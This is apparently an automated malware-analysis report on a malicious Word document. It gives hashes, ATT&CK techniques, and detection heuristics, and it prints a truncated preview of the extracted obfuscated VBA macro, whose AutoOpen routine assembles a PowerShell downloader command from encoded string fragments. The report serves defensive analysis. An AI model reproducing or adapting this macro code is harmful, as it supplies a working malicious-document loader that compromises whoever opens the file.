Office (OLE) malware analysis — malicious · 60cd99886e9e2830

MALICIOUS

Office (OLE)

238.0 KB Created: 2018-07-06 10:20:00 Authoring application: Microsoft Office Word First seen: 2019-11-20

MD5: 2a4e69a7cf4c51df72fa1941af1a6924 SHA-1: 6dafc1372f6ec0d779c66c3e56f9cd66cb9281e9 SHA-256: 60cd99886e9e2830135ef5e694cf1d4efe3ccdfc24d35c13757bb62ee88ef750

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing an AutoOpen VBA macro. This macro is obfuscated and uses CreateObject and Shell calls to execute a second-stage payload. The script attempts to construct and execute a PowerShell command, indicating a downloader or dropper functionality.

Heuristics 8

VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9696 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9696 bytes
SHA-256: `196e918f04112ad39e411aaa0f46eca82104254e7b706bddc65f0cf72342121f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "djcjdvvaZtdGm" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next MKczL = qwqzj - KwRHhC + (79367 + NLTTA + YjPQl * QtjsqJ - (54187 - viKvE + SqiWX - isEArJ)) zjQDsi = dJYXki - jToLW + (5951 + WrUan + ZLrMMH * ANcsVZ - (36741 - LsDTGn + miBtoj - ovdFoY)) tJjZMp = RSYQY - XifAXO + (93403 + iCttA + YpfBh * oXlBl - (68754 - sAYFG + KLOYAU - ziLGnj)) NPJPNw = ZOQESp - WuBrRa + (22378 + NSBJc + itaqq * HibQi - (94147 - bvkiDn + oMoFjG - tCrNDW)) bmWjKm = sdPnzE - Kzntp + (1244 + QfhmN + MiOFX * FZliWo - (45753 - Vuljv + iAJAmV - dLHpwz)) sSwRwRKCPNbvqO (juXhcE + tGCDDBEp + wVTFBFA) jhdur = wiPVA - bYCXzD + (7988 + Dcmwrq + LZRkA * jJVTRo - (79596 - prujD + DNzDo - WKGui)) pNbRj = TkIUaj - dkwWn + (48064 + FUKjw + cjCfa * hauUcV - (15524 - tDzLjr + YHPjj - cPVCrV)) End Sub Attribute VB_Name = "znJwlzp" Function juXhcE() On Error Resume Next DhfcF = (dwSsW + zViBf) * (PqFwY * pAuLm / bzwjNc * mICSr) wvAkmI = 51131 * miNFJ * nFfSM / RYcSIF - sKMYNB / XtAKZd SmIiwWn = "wershell " + " " + " " + " " + Chr(34) + "$" + Chr(40) + "Set" + "-ITEM '" + "VARIa" + "bLe:OF" + "S' ''" STHSM = 98547 * WAfQI * Thbji / OZGzDL - tEVtiS / NJzAm CfNTA = 97092 * SffbzC * jCwws / TiLvLB - ZJZdcI / ibkRp lnAko = 50958 * zfwjtn * oQlmv / QlGwlq - CiBlki / NOGMJT LVFJj = 68223 * iENLa * sYURI / DWIGCw - wRFRjI / THIFm HpXikp = 98902 * Tiswio * MTEGXF / BHwwtJ - ibtNo / jiRSW pZmHXwf = Chr(41) + Chr(34) + Chr(43) + " [St" + "rinG]" + Chr(40) + " '2" + "2M100!1" + "17p106B1" + "5!92%87i6" + "9@31!93@8" + "0%88p87@" + "81M70!18" + "%124n87S7" qFMSCB = 22306 * HSJqf * DPDKsl / dmjCQn - POijjW / Dujwpm dwGNZXNkHd = "0!28V10" + "1V87p8" + "0V113" + "S94M91" + "p87B92S" + "70V9B2" + "2p90p11" + "9S101%" + "15%21" + "n90i70" XRdiEs = 4164 * ijlNSf * lNZus / cKJFzV - ODwpf / JkmEhX GzEam = 58262 * dOdSb * AdpSRp / GtoMUU - ZZQwvq / RjJFvR wzkRk = 28892 * KcMLF * uHUdE / iNfiv - iVfwIs / fliKY lLHjWGkk = "%70B" + "66!8i2" + "9!29V" + "69n6" + "9n69p28" + "@65p70%95" + "p83i64%7" + "5M65%89" + "V83S64%" + "83V89" + "@93@94i94" BfhPX = 4003 * LtjEIN * sGSqz / zjXkn - ujNVXZ / lmjmE QwAFo = 56382 * zLLkwM * iCTJjc / jjJbZs - SdNYz / pjcwQB iVOOs = 93404 * HbRXq * bPOHfz / ccBFf - BiXRq / zVJmAi dFCLl = 62844 * ZRwdb * zKUIw / oHPzXM - DbXMTN / bZsiL SGHQJfZKHXm = "p75n28M" + "81@93" + "p95%29%" + "104n" + "65S125p" + "72%103i" LhslE = 82680 * TrzDU * MqiPkd / iwLzcD - ZXsiwr / Xcjoo JVZwP = 12226 * lRBRA * oNVsI / thvwQ - cZpOv / wNVYdm JaJDVKfsCAw = "64!29V1" + "14@90@70n" + "70V66!8@2" + "9%29S69" + "V69B" + "69%28i65" + "%64V91V9" + "5M83p9" inFrQz = 38320 * KGqfm * cOWIr / hiXWaU - CPkjpv / OtpHA afEYLJ = "0V83M" + "92!6" + "5M66M83" + "B64p87%6" + "5p28" + "%81n93" + "i95!29n8" + "8B90V11" iHFvJ = 81148 * KGdLaP * QjQwK / GaXAj - JiYPIj / izQQfK ESYFnm = 65201 * jMTjPw * mkCYD / dnFRi - uGRjzh / FSSQoK FdFiV = 78315 * dFqDw * wDjELb / KlqVbw - AASllO / BwSVN wabEdoz = "9p117M92S" + "70!29" + "S114i90p" + "70B70" + "n66B8@29" + "n29n" + "69S69B69" + "V28n6" + "5%91B" + "65M86" + "@87%81@" + "83B6" GRCwJ = 64849 * iSpqi * fTnEDn / OcWBdt - UUOOz / JjoPk OWrfI = 67361 * ECtPPJ * HVMiAi / nTFPc - WZRhqu / STWZS wjQIr = 7340 * mwdjGQ * EduAU / jpNEa - ZRzfXU / ZsfMNK lNfbhjcQ = "4%28" + "@81M9" + "3p29n74" + "S96B6" + "6S85%87n2" + "9%114%90!" + "70@70i66!" + "8@29n2" + "9%80i" + "83S71%70" + "!87S28V93" + "n64!85i" wlIFU = 87618 * KAfJvC * ClPfsX / lMYUIN - wnQszz / hzJIwl kENZj = 51814 * vORYcQ * OcPaP / UCpsW - wHRDT / bzKDi Ndddr = 35818 * HNZwRp * DmPDu / vzDOT - QqPrQ / JYwjl Bjzwr = 31821 * JmPIhL * jkLfw / NPRvD - UnGXvl / UKrUK TtPQk = "29%116i" + "0n4B98B1" + "07V71" + "%64@29!11" + "4B90" + "n70V70i66" + "i8p29M" + "29!69M69" + "p69V" pbBYrP = 98479 * vvjIWi * ... (truncated)

SHA-256: 196e918f04112ad39e411aaa0f46eca82104254e7b706bddc65f0cf72342121f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "djcjdvvaZtdGm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   MKczL = qwqzj - KwRHhC + (79367 + NLTTA + YjPQl * QtjsqJ - (54187 - viKvE + SqiWX - isEArJ))
   zjQDsi = dJYXki - jToLW + (5951 + WrUan + ZLrMMH * ANcsVZ - (36741 - LsDTGn + miBtoj - ovdFoY))
   tJjZMp = RSYQY - XifAXO + (93403 + iCttA + YpfBh * oXlBl - (68754 - sAYFG + KLOYAU - ziLGnj))
   NPJPNw = ZOQESp - WuBrRa + (22378 + NSBJc + itaqq * HibQi - (94147 - bvkiDn + oMoFjG - tCrNDW))
   bmWjKm = sdPnzE - Kzntp + (1244 + QfhmN + MiOFX * FZliWo - (45753 - Vuljv + iAJAmV - dLHpwz))
sSwRwRKCPNbvqO (juXhcE + tGCDDBEp + wVTFBFA)
   jhdur = wiPVA - bYCXzD + (7988 + Dcmwrq + LZRkA * jJVTRo - (79596 - prujD + DNzDo - WKGui))
   pNbRj = TkIUaj - dkwWn + (48064 + FUKjw + cjCfa * hauUcV - (15524 - tDzLjr + YHPjj - cPVCrV))
End Sub


Attribute VB_Name = "znJwlzp"
Function juXhcE()
On Error Resume Next
DhfcF = (dwSsW + zViBf) * (PqFwY * pAuLm / bzwjNc * mICSr)
   wvAkmI = 51131 * miNFJ * nFfSM / RYcSIF - sKMYNB / XtAKZd
SmIiwWn = "wershell " + "     " + "      " + "       " + Chr(34) + "$" + Chr(40) + "Set" + "-ITEM  '" + "VARIa" + "bLe:OF" + "S' ''"
STHSM = 98547 * WAfQI * Thbji / OZGzDL - tEVtiS / NJzAm
   CfNTA = 97092 * SffbzC * jCwws / TiLvLB - ZJZdcI / ibkRp
   lnAko = 50958 * zfwjtn * oQlmv / QlGwlq - CiBlki / NOGMJT
   LVFJj = 68223 * iENLa * sYURI / DWIGCw - wRFRjI / THIFm
   HpXikp = 98902 * Tiswio * MTEGXF / BHwwtJ - ibtNo / jiRSW
pZmHXwf = Chr(41) + Chr(34) + Chr(43) + " [St" + "rinG]" + Chr(40) + " '2" + "2M100!1" + "17p106B1" + "5!92%87i6" + "9@31!93@8" + "0%88p87@" + "81M70!18" + "%124n87S7"
qFMSCB = 22306 * HSJqf * DPDKsl / dmjCQn - POijjW / Dujwpm
dwGNZXNkHd = "0!28V10" + "1V87p8" + "0V113" + "S94M91" + "p87B92S" + "70V9B2" + "2p90p11" + "9S101%" + "15%21" + "n90i70"
XRdiEs = 4164 * ijlNSf * lNZus / cKJFzV - ODwpf / JkmEhX
   GzEam = 58262 * dOdSb * AdpSRp / GtoMUU - ZZQwvq / RjJFvR
   wzkRk = 28892 * KcMLF * uHUdE / iNfiv - iVfwIs / fliKY
lLHjWGkk = "%70B" + "66!8i2" + "9!29V" + "69n6" + "9n69p28" + "@65p70%95" + "p83i64%7" + "5M65%89" + "V83S64%" + "83V89" + "@93@94i94"
BfhPX = 4003 * LtjEIN * sGSqz / zjXkn - ujNVXZ / lmjmE
   QwAFo = 56382 * zLLkwM * iCTJjc / jjJbZs - SdNYz / pjcwQB
   iVOOs = 93404 * HbRXq * bPOHfz / ccBFf - BiXRq / zVJmAi
   dFCLl = 62844 * ZRwdb * zKUIw / oHPzXM - DbXMTN / bZsiL
SGHQJfZKHXm = "p75n28M" + "81@93" + "p95%29%" + "104n" + "65S125p" + "72%103i"
LhslE = 82680 * TrzDU * MqiPkd / iwLzcD - ZXsiwr / Xcjoo
   JVZwP = 12226 * lRBRA * oNVsI / thvwQ - cZpOv / wNVYdm
JaJDVKfsCAw = "64!29V1" + "14@90@70n" + "70V66!8@2" + "9%29S69" + "V69B" + "69%28i65" + "%64V91V9" + "5M83p9"
inFrQz = 38320 * KGqfm * cOWIr / hiXWaU - CPkjpv / OtpHA
afEYLJ = "0V83M" + "92!6" + "5M66M83" + "B64p87%6" + "5p28" + "%81n93" + "i95!29n8" + "8B90V11"
iHFvJ = 81148 * KGdLaP * QjQwK / GaXAj - JiYPIj / izQQfK
   ESYFnm = 65201 * jMTjPw * mkCYD / dnFRi - uGRjzh / FSSQoK
   FdFiV = 78315 * dFqDw * wDjELb / KlqVbw - AASllO / BwSVN
wabEdoz = "9p117M92S" + "70!29" + "S114i90p" + "70B70" + "n66B8@29" + "n29n" + "69S69B69" + "V28n6" + "5%91B" + "65M86" + "@87%81@" + "83B6"
GRCwJ = 64849 * iSpqi * fTnEDn / OcWBdt - UUOOz / JjoPk
   OWrfI = 67361 * ECtPPJ * HVMiAi / nTFPc - WZRhqu / STWZS
   wjQIr = 7340 * mwdjGQ * EduAU / jpNEa - ZRzfXU / ZsfMNK
lNfbhjcQ = "4%28" + "@81M9" + "3p29n74" + "S96B6" + "6S85%87n2" + "9%114%90!" + "70@70i66!" + "8@29n2" + "9%80i" + "83S71%70" + "!87S28V93" + "n64!85i"
wlIFU = 87618 * KAfJvC * ClPfsX / lMYUIN - wnQszz / hzJIwl
   kENZj = 51814 * vORYcQ * OcPaP / UCpsW - wHRDT / bzKDi
   Ndddr = 35818 * HNZwRp * DmPDu / vzDOT - QqPrQ / JYwjl
   Bjzwr = 31821 * JmPIhL * jkLfw / NPRvD - UnGXvl / UKrUK
TtPQk = "29%116i" + "0n4B98B1" + "07V71" + "%64@29!11" + "4B90" + "n70V70i66" + "i8p29M" + "29!69M69" + "p69V"
pbBYrP = 98479 * vvjIWi *
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.